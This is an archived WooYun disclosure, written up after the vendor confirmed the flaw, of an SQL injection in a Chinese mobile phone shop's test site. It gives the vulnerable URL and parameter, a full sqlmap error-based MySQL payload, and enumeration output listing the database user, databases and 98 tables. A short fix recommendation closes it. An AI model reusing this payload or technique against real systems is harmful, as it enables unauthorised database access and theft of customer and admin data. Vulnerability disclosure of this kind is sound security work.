WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------------- http://drop.zone.ci/
2015-03-30: Details sent to the vendor, awaiting the vendor's handling
2015-03-30: Vendor has confirmed; details disclosed to the vendor only
2015-04-09: Details disclosed to core white hats and experts in related fields
2015-04-19: Details disclosed to ordinary white hats
2015-04-29: Details disclosed to intern white hats
2015-05-14: Details disclosed to the public
A SQL injection in the Yaya (丫丫) mobile phone mall
http://mtest.yaya888.com/list.php?cat=1&id=62&f2=&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8
A search-type SQL injection; the injectable parameter is f2=
Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://mtest.yaya888.com:80/list.php?cat=1&id=62&f2=%' AND (SELECT 1417 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (CASE WHEN (1417=1417) THEN 1 ELSE 0 END)),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and '%'='&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8
---
[21:20:15] [INFO] testing MySQL
[21:20:15] [WARNING] reflective value(s) found and filtering out
[21:20:15] [INFO] confirming MySQL
[21:20:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.8
back-end DBMS: MySQL >= 5.0.0
[21:20:15] [INFO] fetching current user
[21:20:15] [INFO] retrieved: yaya_cdb_pc@%
current user: 'yaya_cdb_pc@%'
available databases [10]:
[*] baobao
[*] information_schema
[*] kmyaya
[*] kmyaya6
[*] kmyaya_bak
[*] kmyaya_bak2
[*] kmyaya_bak3
[*] mysql
[*] test
[*] yaya_appapi
Check whether this is your database..
Database: kmyaya6
[98 tables]
+------------------------+
| coupon_con             |
| coupon_stuff           |
| coupon_verify          |
| coupon_visits          |
| game_cd_gift           |
| game_cd_user           |
| game_zhuanpan_gift     |
| game_zhuanpan_gift_bak |
| game_zhuanpan_open     |
| game_zhuanpan_open_bak |
| game_zhuanpan_pici     |
| game_zhuanpan_user     |
| game_zhuanpan_user_bak |
| lottery                |
| lottery_activity       |
| lottery_log            |
| oa_active_log          |
| oa_active_order        |
| oa_article             |
| oa_backvisit           |
| oa_computer            |
| oa_customer            |
| oa_customer_log        |
| oa_customer_score_log  |
| oa_document            |
| oa_ip                  |
| oa_iplogin             |
| oa_modlist             |
| oa_money_class         |
| oa_money_detail        |
| oa_offer_code          |
| oa_offer_event         |
| oa_offer_task          |
| oa_personnel_files     |
| oa_qwgh                |
| oa_reset               |
| oa_service             |
| oa_set_depart          |
| oa_set_member_rank     |
| oa_set_parameter       |
| oa_set_shop            |
| oa_stock               |
| oa_stock_archive       |
| oa_stock_booking       |
| oa_stock_detail        |
| oa_stock_inventory     |
| oa_stock_move          |
| oa_url                 |
| oa_user                |
| oa_user_log            |
| oa_user_login          |
| oa_usergroup           |
| oa_wx_status           |
| sms_sended             |
| sms_sending            |
| sms_tpl                |
| sms_user               |
| sys_actgoods           |
| sys_ad                 |
| sys_ad_position        |
| sys_address            |
| sys_admin              |
| sys_admin_log          |
| sys_admin_login        |
| sys_ads                |
| sys_advertisement      |
| sys_app_fenlei         |
| sys_article            |
| sys_article_cat        |
| sys_bai_nian           |
| sys_brand              |
| sys_brands             |
| sys_byself             |
| sys_cart               |
| sys_cart_detail        |
| sys_client_company     |
| sys_client_phone       |
| sys_client_question    |
| sys_client_records     |
| sys_codesend           |
| sys_comment            |
| sys_contract           |
| sys_contract_a         |
| sys_contract_config    |
| sys_cprice             |
| sys_cup_comment        |
| sys_cup_match          |
| sys_cup_taking         |
| sys_district           |
| sys_friend_link        |
| sys_friendlink         |
| sys_game_batch         |
| sys_game_gift          |
| sys_game_open          |
| sys_game_order         |
| sys_game_type          |
| sys_game_user          |
| sys_goods              |
+------------------------+
Check whether these are your tables...
As above
Filtering % and ' is enough..
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-03-30 12:57
Thank you very much
None yet